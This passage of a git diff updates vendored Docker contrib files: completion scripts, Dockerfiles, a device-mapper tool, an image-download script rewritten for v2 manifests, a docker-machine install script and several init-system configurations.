-    _arguments $(__docker_arguments) -C \
-        "(: -)"{-h,--help}"[Print usage]" \
-        "($help)--config[Location of client config files]:path:_directories" \
-        "($help -D --debug)"{-D,--debug}"[Enable debug mode]" \
-        "($help -H --host)"{-H=,--host=}"[tcp://host:port to bind/connect to]:host: " \
-        "($help -l --log-level)"{-l=,--log-level=}"[Logging level]:level:(debug info warn error fatal)" \
-        "($help)--tls[Use TLS]" \
-        "($help)--tlscacert=[Trust certs signed only by this CA]:PEM file:_files -g "*.(pem|crt)"" \
-        "($help)--tlscert=[Path to TLS certificate file]:PEM file:_files -g "*.(pem|crt)"" \
-        "($help)--tlskey=[Path to TLS key file]:Key file:_files -g "*.(pem|key)"" \
-        "($help)--tlsverify[Use TLS and verify the remote]" \
-        "($help)--userland-proxy[Use userland proxy for loopback traffic]" \
-        "($help -v --version)"{-v,--version}"[Print version information and quit]" \
-        "($help -): :->command" \
-        "($help -)*:: :->option-or-argument" && ret=0
-
-    local host=${opt_args[-H]}${opt_args[--host]}
-    local config=${opt_args[--config]}
-    local docker_options="${host:+--host $host} ${config:+--config $config}"
-
-    case $state in
-        (command)
-            __docker_commands && ret=0
-            ;;
-        (option-or-argument)
-            curcontext=${curcontext%:*:*}:docker-$words[1]:
-            __docker_subcommand && ret=0
-            ;;
-    esac
-
-    return ret
-}
-
-_dockerd() {
-    integer ret=1
-    words[1]='daemon'
-    __docker_subcommand && ret=0
-    return ret
-}
-
-_docker "$@"
-
-# Local Variables:
-# mode: Shell-Script
-# sh-indentation: 4
-# indent-tabs-mode: nil
-# sh-basic-offset: 4
-# End:
-# vim: ft=zsh sw=4 ts=4 et
diff --git a/vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile b/vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile
index 5cacd1f999..187281644f 100644
--- a/vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile
+++ b/vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile
@@ -22,7 +22,7 @@
 
 # Base docker image
 FROM debian:jessie
-MAINTAINER Jessica Frazelle <jess@docker.com>
+LABEL maintainer Jessica Frazelle <jess@docker.com>
 
 # Install Chromium
 RUN apt-get update && apt-get install -y \
diff --git a/vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile b/vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile
index 3ddb23208d..8a9b646ee4 100644
--- a/vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile
+++ b/vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile
@@ -19,7 +19,7 @@
 
 # Base docker image
 FROM debian:jessie
-MAINTAINER Jessica Frazelle <jess@docker.com>
+LABEL maintainer Jessica Frazelle <jess@docker.com>
 
 # Install Gparted and its dependencies
 RUN apt-get update && apt-get install -y \
diff --git a/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go b/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go
index 906d064df6..d3ec46a8b4 100644
--- a/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go
+++ b/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go
@@ -1,4 +1,4 @@
-// +build !windows,!solaris
+// +build !windows
 
 package main
 
@@ -11,9 +11,9 @@ import (
 	"strconv"
 	"strings"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/daemon/graphdriver/devmapper"
 	"github.com/docker/docker/pkg/devicemapper"
+	"github.com/sirupsen/logrus"
 )
 
 func usage() {
@@ -90,14 +90,12 @@ func main() {
 		fmt.Printf("Sector size: %d\n", status.SectorSize)
 		fmt.Printf("Data use: %d of %d (%.1f %%)\n", status.Data.Used, status.Data.Total, 100.0*float64(status.Data.Used)/float64(status.Data.Total))
 		fmt.Printf("Metadata use: %d of %d (%.1f %%)\n", status.Metadata.Used, status.Metadata.Total, 100.0*float64(status.Metadata.Used)/float64(status.Metadata.Total))
-		break
 	case "list":
 		ids := devices.List()
 		sort.Strings(ids)
 		for _, id := range ids {
 			fmt.Println(id)
 		}
-		break
 	case "device":
 		if flag.NArg() < 2 {
 			usage()
@@ -113,7 +111,6 @@ func main() {
 		fmt.Printf("Size in Sectors: %d\n", status.SizeInSectors)
 		fmt.Printf("Mapped Sectors: %d\n", status.MappedSectors)
 		fmt.Printf("Highest Mapped Sector: %d\n", status.HighestMappedSector)
-		break
 	case "resize":
 		if flag.NArg() < 2 {
 			usage()
@@ -131,7 +128,6 @@ func main() {
 			os.Exit(1)
 		}
 
-		break
 	case "snap":
 		if flag.NArg() < 3 {
 			usage()
@@ -142,7 +138,6 @@ func main() {
 			fmt.Println("Can't create snap device: ", err)
 			os.Exit(1)
 		}
-		break
 	case "remove":
 		if flag.NArg() < 2 {
 			usage()
@@ -153,7 +148,6 @@ func main() {
 			fmt.Println("Can't remove device: ", err)
 			os.Exit(1)
 		}
-		break
 	case "mount":
 		if flag.NArg() < 3 {
 			usage()
@@ -161,16 +155,13 @@ func main() {
 
 		err := devices.MountDevice(args[1], args[2], "")
 		if err != nil {
-			fmt.Println("Can't create snap device: ", err)
+			fmt.Println("Can't mount device: ", err)
 			os.Exit(1)
 		}
-		break
 	default:
 		fmt.Printf("Unknown command %s\n", args[0])
 		usage()
 
 		os.Exit(1)
 	}
-
-	return
 }
diff --git a/vendor/github.com/docker/docker/contrib/docker-machine-install-bundle.sh b/vendor/github.com/docker/docker/contrib/docker-machine-install-bundle.sh
new file mode 100755
index 0000000000..860598943b
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/docker-machine-install-bundle.sh
@@ -0,0 +1,111 @@
+#!/usr/bin/env bash
+#
+# This script installs the bundle to Docker Machine instances, for the purpose
+# of testing the latest Docker with Swarm mode enabled.
+# Do not use in production.
+#
+# Requirements (on host to run this script)
+#  - bash is installed
+#  - Docker Machine is installed
+#  - GNU tar is installed
+#
+# Requirements (on Docker machine instances)
+#  - Docker can be managed via one of  `systemctl`, `service`, or `/etc/init.d/docker`
+#
+set -e
+set -o pipefail
+
+errexit() {
+    echo "$1"
+    exit 1
+}
+
+BUNDLE="bundles/$(cat VERSION)"
+
+bundle_files(){
+    # prefer dynbinary if exists
+    for f in dockerd docker-proxy; do
+	if [ -d $BUNDLE/dynbinary-daemon ]; then
+	    echo $BUNDLE/dynbinary-daemon/$f
+	else
+	    echo $BUNDLE/binary-daemon/$f
+	fi
+    done
+    for f in docker-containerd docker-containerd-ctr docker-containerd-shim docker-init docker-runc; do
+	echo $BUNDLE/binary-daemon/$f
+    done
+    if [ -d $BUNDLE/dynbinary-client ]; then
+	echo $BUNDLE/dynbinary-client/docker
+    else
+	echo $BUNDLE/binary-client/docker
+    fi
+}
+
+control_docker(){
+    m=$1; op=$2
+    # NOTE: `docker-machine ssh $m sh -c "foo bar"` does not work
+    #       (but `docker-machine ssh $m sh -c "foo\ bar"` works)
+    #       Anyway we avoid using `sh -c` here for avoiding confusion
+    cat <<EOF | docker-machine ssh $m sudo sh
+if command -v systemctl > /dev/null; then
+  systemctl $op docker
+elif command -v service > /dev/null; then
+  service docker $op
+elif [ -x /etc/init.d/docker ]; then
+  /etc/init.d/docker $op
+else
+  echo "not sure how to control the docker daemon"
+  exit 1
+fi
+EOF
+}
+
+detect_prefix(){
+    m=$1
+    script='dirname $(dirname $(which dockerd))'
+    echo $script | docker-machine ssh $m sh
+}
+
+install_to(){
+    m=$1; shift; files=$@
+    echo "$m: detecting docker"
+    prefix=$(detect_prefix $m)
+    echo "$m: detected docker on $prefix"
+    echo "$m: stopping docker"
+    control_docker $m stop
+    echo "$m: installing docker"
+    # NOTE: GNU tar is required because we use --transform here
+    # TODO: compression (should not be default)
+    tar ch --transform 's/.*\///' $files | docker-machine ssh $m sudo tar Cx $prefix/bin
+    echo "$m: starting docker"
+    control_docker $m start
+    echo "$m: done"
+}
+
+check_prereq(){
+    command -v docker-machine > /dev/null || errexit "docker-machine not installed"
+    ( tar --version | grep GNU > /dev/null ) || errexit "GNU tar not installed"
+}
+
+case "$1" in
+    "install")
+	shift; machines=$@
+	check_prereq
+	files=$(bundle_files)
+	echo "Files to be installed:"
+	for f in $files; do echo $f; done
+	pids=()
+	for m in $machines; do
+	    install_to $m $files &
+	    pids+=($!)
+	done
+	status=0
+	for pid in ${pids[@]}; do
+	    wait $pid || { status=$?; echo "background process $pid failed with exit status $status"; }
+	done
+	exit $status
+	;;
+    *)
+	errexit "Usage: $0 install MACHINES"
+	;;
+esac
diff --git a/vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh b/vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh
index 29d7ff59fd..77c91d1f1b 100755
--- a/vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh
+++ b/vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh
@@ -1,4 +1,4 @@
-#!/bin/bash
+#!/usr/bin/env bash
 set -e
 
 # hello-world                      latest              ef872312fe1b        3 months ago        910 B
diff --git a/vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh b/vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh
index 111e3fa2ba..54b592307f 100755
--- a/vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh
+++ b/vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh
@@ -1,16 +1,19 @@
-#!/bin/bash
-set -e
+#!/usr/bin/env bash
+set -eo pipefail
 
 # hello-world                      latest              ef872312fe1b        3 months ago        910 B
 # hello-world                      latest              ef872312fe1bbc5e05aae626791a47ee9b032efa8f3bda39cc0be7b56bfe59b9   3 months ago        910 B
 
 # debian                           latest              f6fab3b798be        10 weeks ago        85.1 MB
 # debian                           latest              f6fab3b798be3174f45aa1eb731f8182705555f89c9026d8c1ef230cbf8301dd   10 weeks ago        85.1 MB
-
 if ! command -v curl &> /dev/null; then
 	echo >&2 'error: "curl" not found!'
 	exit 1
 fi
+if ! command -v jq &> /dev/null; then
+	echo >&2 'error: "jq" not found!'
+	exit 1
+fi
 
 usage() {
 	echo "usage: $0 dir image[:tag][@digest] ..."
@@ -27,8 +30,158 @@ mkdir -p "$dir"
 # hacky workarounds for Bash 3 support (no associative arrays)
 images=()
 rm -f "$dir"/tags-*.tmp
+manifestJsonEntries=()
+doNotGenerateManifestJson=
 # repositories[busybox]='"latest": "...", "ubuntu-14.04": "..."'
 
+# bash v4 on Windows CI requires CRLF separator
+newlineIFS=$'\n'
+if [ "$(go env GOHOSTOS)" = 'windows' ]; then
+	major=$(echo ${BASH_VERSION%%[^0.9]} | cut -d. -f1)
+	if [ "$major" -ge 4 ]; then
+		newlineIFS=$'\r\n'
+	fi
+fi
+
+registryBase='https://registry-1.docker.io'
+authBase='https://auth.docker.io'
+authService='registry.docker.io'
+
+# https://github.com/moby/moby/issues/33700
+fetch_blob() {
+	local token="$1"; shift
+	local image="$1"; shift
+	local digest="$1"; shift
+	local targetFile="$1"; shift
+	local curlArgs=( "$@" )
+
+	local curlHeaders="$(
+		curl -S "${curlArgs[@]}" \
+			-H "Authorization: Bearer $token" \
+			"$registryBase/v2/$image/blobs/$digest" \
+			-o "$targetFile" \
+			-D-
+	)"
+	curlHeaders="$(echo "$curlHeaders" | tr -d '\r')"
+	if grep -qE "^HTTP/[0-9].[0-9] 3" <<<"$curlHeaders"; then
+		rm -f "$targetFile"
+
+		local blobRedirect="$(echo "$curlHeaders" | awk -F ': ' 'tolower($1) == "location" { print $2; exit }')"
+		if [ -z "$blobRedirect" ]; then
+			echo >&2 "error: failed fetching '$image' blob '$digest'"
+			echo "$curlHeaders" | head -1 >&2
+			return 1
+		fi
+
+		curl -fSL "${curlArgs[@]}" \
+			"$blobRedirect" \
+			-o "$targetFile"
+	fi
+}
+
+# handle 'application/vnd.docker.distribution.manifest.v2+json' manifest
+handle_single_manifest_v2() {
+	local manifestJson="$1"; shift
+
+	local configDigest="$(echo "$manifestJson" | jq --raw-output '.config.digest')"
+	local imageId="${configDigest#*:}" # strip off "sha256:"
+
+	local configFile="$imageId.json"
+	fetch_blob "$token" "$image" "$configDigest" "$dir/$configFile" -s
+
+	local layersFs="$(echo "$manifestJson" | jq --raw-output --compact-output '.layers[]')"
+	local IFS="$newlineIFS"
+	local layers=( $layersFs )
+	unset IFS
+
+	echo "Downloading '$imageIdentifier' (${#layers[@]} layers)..."
+	local layerId=
+	local layerFiles=()
+	for i in "${!layers[@]}"; do
+		local layerMeta="${layers[$i]}"
+
+		local layerMediaType="$(echo "$layerMeta" | jq --raw-output '.mediaType')"
+		local layerDigest="$(echo "$layerMeta" | jq --raw-output '.digest')"
+
+		# save the previous layer's ID
+		local parentId="$layerId"
+		# create a new fake layer ID based on this layer's digest and the previous layer's fake ID
+		layerId="$(echo "$parentId"$'\n'"$layerDigest" | sha256sum | cut -d' ' -f1)"
+		# this accounts for the possibility that an image contains the same layer twice (and thus has a duplicate digest value)
+
+		mkdir -p "$dir/$layerId"
+		echo '1.0' > "$dir/$layerId/VERSION"
+
+		if [ ! -s "$dir/$layerId/json" ]; then
+			local parentJson="$(printf ', parent: "%s"' "$parentId")"
+			local addJson="$(printf '{ id: "%s"%s }' "$layerId" "${parentId:+$parentJson}")"
+			# this starter JSON is taken directly from Docker's own "docker save" output for unimportant layers
+			jq "$addJson + ." > "$dir/$layerId/json" <<-'EOJSON'
+				{
+					"created": "0001-01-01T00:00:00Z",
+					"container_config": {
+						"Hostname": "",
+						"Domainname": "",
+						"User": "",
+						"AttachStdin": false,
+						"AttachStdout": false,
+						"AttachStderr": false,
+						"Tty": false,
+						"OpenStdin": false,
+						"StdinOnce": false,
+						"Env": null,
+						"Cmd": null,
+						"Image": "",
+						"Volumes": null,
+						"WorkingDir": "",
+						"Entrypoint": null,
+						"OnBuild": null,
+						"Labels": null
+					}
+				}
+			EOJSON
+		fi
+
+		case "$layerMediaType" in
+			application/vnd.docker.image.rootfs.diff.tar.gzip)
+				local layerTar="$layerId/layer.tar"
+				layerFiles=( "${layerFiles[@]}" "$layerTar" )
+				# TODO figure out why "-C -" doesn't work here
+				# "curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume."
+				# "HTTP/1.1 416 Requested Range Not Satisfiable"
+				if [ -f "$dir/$layerTar" ]; then
+					# TODO hackpatch for no -C support :'(
+					echo "skipping existing ${layerId:0:12}"
+					continue
+				fi
+				local token="$(curl -fsSL "$authBase/token?service=$authService&scope=repository:$image:pull" | jq --raw-output '.token')"
+				fetch_blob "$token" "$image" "$layerDigest" "$dir/$layerTar" --progress
+				;;
+
+			*)
+				echo >&2 "error: unknown layer mediaType ($imageIdentifier, $layerDigest): '$layerMediaType'"
+				exit 1
+				;;
+		esac
+	done
+
+	# change "$imageId" to be the ID of the last layer we added (needed for old-style "repositories" file which is created later -- specifically for older Docker daemons)
+	imageId="$layerId"
+
+	# munge the top layer image manifest to have the appropriate image configuration for older daemons
+	local imageOldConfig="$(jq --raw-output --compact-output '{ id: .id } + if .parent then { parent: .parent } else {} end' "$dir/$imageId/json")"
+	jq --raw-output "$imageOldConfig + del(.history, .rootfs)" "$dir/$configFile" > "$dir/$imageId/json"
+
+	local manifestJsonEntry="$(
+		echo '{}' | jq --raw-output '. + {
+			Config: "'"$configFile"'",
+			RepoTags: ["'"${image#library\/}:$tag"'"],
+			Layers: '"$(echo '[]' | jq --raw-output ".$(for layerFile in "${layerFiles[@]}"; do echo " + [ \"$layerFile\" ]"; done)")"'
+		}'
+	)"
+	manifestJsonEntries=( "${manifestJsonEntries[@]}" "$manifestJsonEntry" )
+}
+
 while [ $# -gt 0 ]; do
 	imageTag="$1"
 	shift
@@ -44,30 +197,119 @@ while [ $# -gt 0 ]; do
 
 	imageFile="${image//\//_}" # "/" can't be in filenames :)
 
-	token="$(curl -sSL "https://auth.docker.io/token?service=registry.docker.io&scope=repository:$image:pull" | jq --raw-output .token)"
+	token="$(curl -fsSL "$authBase/token?service=$authService&scope=repository:$image:pull" | jq --raw-output '.token')"
 
-	manifestJson="$(curl -sSL -H "Authorization: Bearer $token" "https://registry-1.docker.io/v2/$image/manifests/$digest")"
+	manifestJson="$(
+		curl -fsSL \
+			-H "Authorization: Bearer $token" \
+			-H 'Accept: application/vnd.docker.distribution.manifest.v2+json' \
+			-H 'Accept: application/vnd.docker.distribution.manifest.list.v2+json' \
+			-H 'Accept: application/vnd.docker.distribution.manifest.v1+json' \
+			"$registryBase/v2/$image/manifests/$digest"
+	)"
 	if [ "${manifestJson:0:1}" != '{' ]; then
 		echo >&2 "error: /v2/$image/manifests/$digest returned something unexpected:"
 		echo >&2 "  $manifestJson"
 		exit 1
 	fi
 
-	layersFs=$(echo "$manifestJson" | jq --raw-output '.fsLayers | .[] | .blobSum')
+	imageIdentifier="$image:$tag@$digest"
 
-	IFS=$'\n'
-	# bash v4 on Windows CI requires CRLF separator
-	if [ "$(go env GOHOSTOS)" = 'windows' ]; then
-		major=$(echo ${BASH_VERSION%%[^0.9]} | cut -d. -f1)
-		if [ "$major" -ge 4 ]; then
-			IFS=$'\r\n'
-		fi
-	fi
-	layers=( ${layersFs} )
-	unset IFS
+	schemaVersion="$(echo "$manifestJson" | jq --raw-output '.schemaVersion')"
+	case "$schemaVersion" in
+		2)
+			mediaType="$(echo "$manifestJson" | jq --raw-output '.mediaType')"
+
+			case "$mediaType" in
+				application/vnd.docker.distribution.manifest.v2+json)
+					handle_single_manifest_v2 "$manifestJson"
+					;;
+				application/vnd.docker.distribution.manifest.list.v2+json)
+					layersFs="$(echo "$manifestJson" | jq --raw-output --compact-output '.manifests[]')"
+					IFS="$newlineIFS"
+					layers=( $layersFs )
+					unset IFS
+
+					found=""
+					# parse first level multi-arch manifest
+					for i in "${!layers[@]}"; do
+						layerMeta="${layers[$i]}"
+						maniArch="$(echo "$layerMeta" | jq --raw-output '.platform.architecture')"
+						if [ "$maniArch" = "$(go env GOARCH)" ]; then
+							digest="$(echo "$layerMeta" | jq --raw-output '.digest')"
+							# get second level single manifest
+							submanifestJson="$(
+								curl -fsSL \
+									-H "Authorization: Bearer $token" \
+									-H 'Accept: application/vnd.docker.distribution.manifest.v2+json' \
+									-H 'Accept: application/vnd.docker.distribution.manifest.list.v2+json' \
+									-H 'Accept: application/vnd.docker.distribution.manifest.v1+json' \
+									"$registryBase/v2/$image/manifests/$digest"
+							)"
+							handle_single_manifest_v2 "$submanifestJson"
+							found="found"
+							break
+						fi
+					done
+					if [ -z "$found" ]; then
+						echo >&2 "error: manifest for $maniArch is not found"
+						exit 1
+					fi
+					;;
+				*)
+					echo >&2 "error: unknown manifest mediaType ($imageIdentifier): '$mediaType'"
+					exit 1
+					;;
+			esac
+			;;
+
+		1)
+			if [ -z "$doNotGenerateManifestJson" ]; then
+				echo >&2 "warning: '$imageIdentifier' uses schemaVersion '$schemaVersion'"
+				echo >&2 "  this script cannot (currently) recreate the 'image config' to put in a 'manifest.json' (thus any schemaVersion 2+ images will be imported in the old way, and their 'docker history' will suffer)"
+				echo >&2
+				doNotGenerateManifestJson=1
+			fi
+
+			layersFs="$(echo "$manifestJson" | jq --raw-output '.fsLayers | .[] | .blobSum')"
+			IFS="$newlineIFS"
+			layers=( $layersFs )
+			unset IFS
+
+			history="$(echo "$manifestJson" | jq '.history | [.[] | .v1Compatibility]')"
+			imageId="$(echo "$history" | jq --raw-output '.[0]' | jq --raw-output '.id')"
 
-	history=$(echo "$manifestJson" | jq '.history | [.[] | .v1Compatibility]')
-	imageId=$(echo "$history" | jq --raw-output .[0] | jq --raw-output .id)
+			echo "Downloading '$imageIdentifier' (${#layers[@]} layers)..."
+			for i in "${!layers[@]}"; do
+				imageJson="$(echo "$history" | jq --raw-output ".[${i}]")"
+				layerId="$(echo "$imageJson" | jq --raw-output '.id')"
+				imageLayer="${layers[$i]}"
+
+				mkdir -p "$dir/$layerId"
+				echo '1.0' > "$dir/$layerId/VERSION"
+
+				echo "$imageJson" > "$dir/$layerId/json"
+
+				# TODO figure out why "-C -" doesn't work here
+				# "curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume."
+				# "HTTP/1.1 416 Requested Range Not Satisfiable"
+				if [ -f "$dir/$layerId/layer.tar" ]; then
+					# TODO hackpatch for no -C support :'(
+					echo "skipping existing ${layerId:0:12}"
+					continue
+				fi
+				token="$(curl -fsSL "$authBase/token?service=$authService&scope=repository:$image:pull" | jq --raw-output '.token')"
+				fetch_blob "$token" "$image" "$imageLayer" "$dir/$layerId/layer.tar" --progress
+			done
+			;;
+
+		*)
+			echo >&2 "error: unknown manifest schemaVersion ($imageIdentifier): '$schemaVersion'"
+			exit 1
+			;;
+	esac
+
+	echo
 
 	if [ -s "$dir/tags-$imageFile.tmp" ]; then
 		echo -n ', ' >> "$dir/tags-$imageFile.tmp"
@@ -75,30 +317,6 @@ while [ $# -gt 0 ]; do
 		images=( "${images[@]}" "$image" )
 	fi
 	echo -n '"'"$tag"'": "'"$imageId"'"' >> "$dir/tags-$imageFile.tmp"
-
-	echo "Downloading '${image}:${tag}@${digest}' (${#layers[@]} layers)..."
-	for i in "${!layers[@]}"; do
-		imageJson=$(echo "$history" | jq --raw-output .[${i}])
-		imageId=$(echo "$imageJson" | jq --raw-output .id)
-		imageLayer=${layers[$i]}
-
-		mkdir -p "$dir/$imageId"
-		echo '1.0' > "$dir/$imageId/VERSION"
-
-		echo "$imageJson" > "$dir/$imageId/json"
-
-		# TODO figure out why "-C -" doesn't work here
-		# "curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume."
-		# "HTTP/1.1 416 Requested Range Not Satisfiable"
-		if [ -f "$dir/$imageId/layer.tar" ]; then
-			# TODO hackpatch for no -C support :'(
-			echo "skipping existing ${imageId:0:12}"
-			continue
-		fi
-		token="$(curl -sSL "https://auth.docker.io/token?service=registry.docker.io&scope=repository:$image:pull" | jq --raw-output .token)"
-		curl -SL --progress -H "Authorization: Bearer $token" "https://registry-1.docker.io/v2/$image/blobs/$imageLayer" -o "$dir/$imageId/layer.tar" # -C -
-	done
-	echo
 done
 
 echo -n '{' > "$dir/repositories"
@@ -116,6 +334,12 @@ echo -n $'\n}\n' >> "$dir/repositories"
 
 rm -f "$dir"/tags-*.tmp
 
+if [ -z "$doNotGenerateManifestJson" ] && [ "${#manifestJsonEntries[@]}" -gt 0 ]; then
+	echo '[]' | jq --raw-output ".$(for entry in "${manifestJsonEntries[@]}"; do echo " + [ $entry ]"; done)" > "$dir/manifest.json"
+else
+	rm -f "$dir/manifest.json"
+fi
+
 echo "Download of images into '$dir' complete."
 echo "Use something like the following to load the result into a Docker daemon:"
 echo "  tar -cC '$dir' . | docker load"
diff --git a/vendor/github.com/docker/docker/contrib/gitdm/domain-map b/vendor/github.com/docker/docker/contrib/gitdm/domain-map
index 1f1849e4f6..17a287e97a 100644
--- a/vendor/github.com/docker/docker/contrib/gitdm/domain-map
+++ b/vendor/github.com/docker/docker/contrib/gitdm/domain-map
@@ -23,7 +23,14 @@ github@hollensbe.org            Docker      < 2015-01-01
 github@hollensbe.org            Cisco
 
 david.calavera@gmail.com        Docker      < 2016-04-01
-david.calavera@gmail.com        Netlify
+david.calavera@gmail.com        (Unknown)
+
+madhu@socketplane.io            Docker
+ejhazlett@gmail.com             Docker
+ben@firshman.co.uk              Docker
+
+vincent@sbr.pm                  (Unknown)   < 2016-10-24
+vincent@sbr.pm                  Docker
 
 #
 # Others
@@ -37,3 +44,4 @@ microsoft.com                   Microsoft
 
 redhat.com                      Red Hat
 mrunalp@gmail.com               Red Hat
+antonio.murdaca@gmail.com       Red Hat
diff --git a/vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh b/vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh
index dd6a564995..dfff5ff204 100755
--- a/vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh
+++ b/vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh
@@ -1,4 +1,4 @@
-#!/bin/bash
+#!/usr/bin/env bash
 
 #
 # This script generates a gitdm compatible email aliases file from a git
diff --git a/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris b/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris
deleted file mode 100644
index 3d0d691c17..0000000000
--- a/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris
+++ /dev/null
@@ -1,4 +0,0 @@
-FROM solaris
-EXPOSE 80/tcp
-COPY httpserver .
-CMD ["./httpserver"]
diff --git a/vendor/github.com/docker/docker/contrib/init/openrc/docker.confd b/vendor/github.com/docker/docker/contrib/init/openrc/docker.confd
index 244403113e..89183de46b 100644
--- a/vendor/github.com/docker/docker/contrib/init/openrc/docker.confd
+++ b/vendor/github.com/docker/docker/contrib/init/openrc/docker.confd
@@ -1,8 +1,18 @@
 # /etc/conf.d/docker: config file for /etc/init.d/docker
 
 # where the docker daemon output gets piped
+# this contains both stdout and stderr. If  you need to separate them,
+# see the settings below
 #DOCKER_LOGFILE="/var/log/docker.log"
 
+# where the docker daemon stdout gets piped
+# if this is not set, DOCKER_LOGFILE is used
+#DOCKER_OUTFILE="/var/log/docker-out.log"
+
+# where the docker daemon stderr gets piped
+# if this is not set, DOCKER_LOGFILE is used
+#DOCKER_ERRFILE="/var/log/docker-err.log"
+
 # where docker's pid get stored
 #DOCKER_PIDFILE="/run/docker.pid"
 
diff --git a/vendor/github.com/docker/docker/contrib/init/openrc/docker.initd b/vendor/github.com/docker/docker/contrib/init/openrc/docker.initd
index 5d3160338a..6c968f607e 100644
--- a/vendor/github.com/docker/docker/contrib/init/openrc/docker.initd
+++ b/vendor/github.com/docker/docker/contrib/init/openrc/docker.initd
@@ -6,8 +6,10 @@ command="${DOCKERD_BINARY:-/usr/bin/dockerd}"
 pidfile="${DOCKER_PIDFILE:-/run/${RC_SVCNAME}.pid}"
 command_args="-p \"${pidfile}\" ${DOCKER_OPTS}"
 DOCKER_LOGFILE="${DOCKER_LOGFILE:-/var/log/${RC_SVCNAME}.log}"
+DOCKER_ERRFILE="${DOCKER_ERRFILE:-${DOCKER_LOGFILE}}"
+DOCKER_OUTFILE="${DOCKER_OUTFILE:-${DOCKER_LOGFILE}}"
 start_stop_daemon_args="--background \
-	--stderr \"${DOCKER_LOGFILE}\" --stdout \"${DOCKER_LOGFILE}\""
+	--stderr \"${DOCKER_ERRFILE}\" --stdout \"${DOCKER_OUTFILE}\""
 
 start_pre() {
 	checkpath -f -m 0644 -o root:docker "$DOCKER_LOGFILE"
diff --git a/vendor/github.com/docker/docker/contrib/init/systemd/docker.service b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service
index 8bfed93c75..517463172b 100644
--- a/vendor/github.com/docker/docker/contrib/init/systemd/docker.service
+++ b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service
@@ -1,7 +1,8 @@
 [Unit]
 Description=Docker Application Container Engine
 Documentation=https://docs.docker.com
-After=network.target docker.socket firewalld.service
+After=network-online.target docker.socket firewalld.service
+Wants=network-online.target
 Requires=docker.socket
 
 [Service]
@@ -24,6 +25,10 @@ TimeoutStartSec=0
 Delegate=yes
 # kill only the docker process, not all processes in the cgroup
 KillMode=process
+# restart the docker process if it exits prematurely
+Restart=on-failure
+StartLimitBurst=3
+StartLimitInterval=60s
 
 [Install]
 WantedBy=multi-user.target
diff --git a/vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm
index 6e41892399..6c60646b56 100644
--- a/vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm
+++ b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm
@@ -1,7 +1,8 @@
 [Unit]
 Description=Docker Application Container Engine
 Documentation=https://docs.docker.com
-After=network.target firewalld.service
+After=network-online.target firewalld.service
+Wants=network-online.target
 
 [Service]
 Type=notify
@@ -23,6 +24,10 @@ TimeoutStartSec=0
 Delegate=yes
 # kill only the docker process, not all processes in the cgroup
 KillMode=process
+# restart the docker process if it exits prematurely
+Restart=on-failure
+StartLimitBurst=3
+StartLimitInterval=60s
 
 [Install]
 WantedBy=multi-user.target
diff --git a/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker b/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker
index 4f9d38dda5..9c8fa6be73 100755
--- a/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker
+++ b/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker
@@ -119,9 +119,13 @@ case "$1" in
 	stop)
 		check_init
 		fail_unless_root
-		log_begin_msg "Stopping $DOCKER_DESC: $BASE"
-		start-stop-daemon --stop --pidfile "$DOCKER_SSD_PIDFILE" --retry 10
-		log_end_msg $?
+		if [ -f "$DOCKER_SSD_PIDFILE" ]; then
+			log_begin_msg "Stopping $DOCKER_DESC: $BASE"
+			start-stop-daemon --stop --pidfile "$DOCKER_SSD_PIDFILE" --retry 10
+			log_end_msg $?
+		else
+			log_warning_msg "Docker already stopped - file $DOCKER_SSD_PIDFILE not found."
+		fi
 		;;
 
 	restart)
diff --git a/vendor/github.com/docker/docker/contrib/mkimage-alpine.sh b/vendor/github.com/docker/docker/contrib/mkimage-alpine.sh
index 47cd35ce62..03180e435a 100755
--- a/vendor/github.com/docker/docker/contrib/mkimage-alpine.sh
+++ b/vendor/github.com/docker/docker/contrib/mkimage-alpine.sh
@@ -8,7 +8,7 @@ set -e
 }
 
 usage() {
-	printf >&2 '%s: [-r release] [-m mirror] [-s]  [-c additional repository]\n' "$0"
+	printf >&2 '%s: [-r release] [-m mirror] [-s] [-c additional repository] [-a arch]\n' "$0"
 	exit 1
 }
 
@@ -47,12 +47,12 @@ pack() {
 }
 
 save() {
-	[ $SAVE -eq 1 ] || return
+	[ $SAVE -eq 1 ] || return 0
